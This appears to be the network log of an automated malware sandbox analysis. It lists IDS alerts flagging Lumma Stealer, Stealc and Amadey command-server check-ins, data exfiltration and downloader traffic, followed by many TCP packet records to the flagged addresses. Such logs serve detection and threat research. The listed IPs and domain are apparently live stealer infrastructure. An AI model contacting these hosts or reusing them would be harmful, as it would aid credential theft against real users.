                                                                                                                                                                                                                                            2024-12-09T21:09:41.519430+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649943104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:42.435053+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649945185.215.113.1680TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:42.584237+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649944185.215.113.20680TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:44.101691+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649951104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:44.101691+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649951104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:46.774416+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649958104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:46.774416+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649958104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:47.108404+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649960104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:47.108404+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649960104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:47.803048+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649958104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:47.803048+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649958104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:48.316285+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649965185.215.113.4380TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:49.091677+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649967104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:49.091677+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649967104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:49.585546+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649973104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:49.585546+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649973104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:49.776192+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649969185.215.113.1680TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:49.858611+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649967104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:49.858611+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649967104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:51.926628+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649979104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:51.926628+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649979104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:54.748280+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649992104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:54.748280+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649992104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:55.294841+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.649994104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:55.294841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649994104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:55.507292+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649992104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:56.981463+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.650000185.215.113.1680TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:58.302568+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.650004185.215.113.20680TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:58.614446+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.650008185.215.113.4380TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:59.001138+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.650013104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:09:59.001138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650013104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:04.213257+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.650033104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:04.213257+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650033104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:06.715591+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.650041104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:06.715591+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650041104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:09.484980+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.650050104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:09.484980+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650050104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:17.127406+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.650065104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:17.127406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650065104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:17.895072+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.650065104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:17.895072+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650065104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:21.138990+01002057922ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)1192.168.2.650074104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:21.138990+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650074104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:21.891581+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.650074104.21.48.1443TCP
                                                                                                                                                                                                                                            2024-12-09T21:10:21.891581+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650074104.21.48.1443TCP
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:03.711316109 CET4984880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:03.830693007 CET8049848185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:03.831163883 CET4984880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:03.831336021 CET4984880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:03.950659037 CET8049848185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:05.209419966 CET8049848185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:05.209521055 CET4984880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.716334105 CET4984880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.716934919 CET4985480192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.836190939 CET8049848185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.836252928 CET8049854185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.836266994 CET4984880192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.836328030 CET4985480192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.836569071 CET4985480192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:06.955858946 CET8049854185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.199217081 CET8049854185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.199306011 CET4985480192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.203707933 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.323009968 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.323101997 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.323261976 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:08.443047047 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655523062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655586004 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655596972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655623913 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655644894 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655734062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655776024 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655922890 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655936003 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655953884 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655961037 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655973911 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655982018 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.655992031 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.656008959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.656171083 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.656182051 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.656209946 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.656224012 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.775032997 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.775068045 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.775147915 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.775171995 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.779230118 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.779284954 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.849423885 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.849490881 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.849564075 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.849582911 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.854342937 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.854402065 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.854474068 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.854517937 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.862121105 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.862188101 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.862276077 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.862319946 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.870548010 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.870613098 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.870634079 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.870677948 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.878813982 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.878914118 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.878933907 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.878973961 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.887224913 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.887298107 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.887360096 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.887402058 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.895576000 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.895663977 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.895709038 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.895756960 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.904108047 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.904218912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.904225111 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.904254913 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.912421942 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.912480116 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.912548065 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.912592888 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.920141935 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.920197010 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.920382023 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.920425892 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.927704096 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.927756071 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.927783012 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.927829027 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.969059944 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.969141006 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.969151974 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:09.969185114 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.041501999 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.041595936 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.041615009 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.041650057 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.043879986 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.043930054 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.043996096 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.044039011 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.047650099 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.047689915 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.047775984 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.047816992 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.052612066 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.052678108 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.052706003 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.052747011 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.057540894 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.057586908 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.057679892 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.057722092 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.062303066 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.062349081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.062369108 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.062407970 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.067028046 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.067075968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.067157984 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.067199945 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.071782112 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.071827888 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.071851969 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.071892977 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.076492071 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.076567888 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.076586962 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.076630116 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.081187963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.081238985 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.081301928 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.081345081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.085920095 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.085971117 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.086046934 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.086095095 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.090641022 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.090699911 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.090765953 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.090810061 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.095427036 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.095509052 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.095617056 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.095664024 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.100179911 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.100194931 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.100254059 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.100294113 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.103903055 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.103945971 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.103964090 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.104007959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.107428074 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.107480049 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.107492924 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.107539892 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.110991955 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.111037016 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.111089945 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.111131907 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.233391047 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.233412981 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.233464956 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.233489990 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.234292030 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.234302998 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.234450102 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.238471031 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.238485098 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.238528013 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.238555908 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.240674019 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.240719080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.241045952 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.241091967 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.243690968 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.243704081 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.243736029 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.243743896 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.246723890 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.246773958 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.246857882 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.246891975 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.249552011 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.249564886 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.249613047 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.249628067 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.252219915 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.252230883 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.252269983 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.252290964 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.255412102 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.255423069 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.255474091 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.258217096 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.258265972 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.258359909 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.258403063 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.261149883 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.261202097 CET4985980192.168.2.631.41.244.11
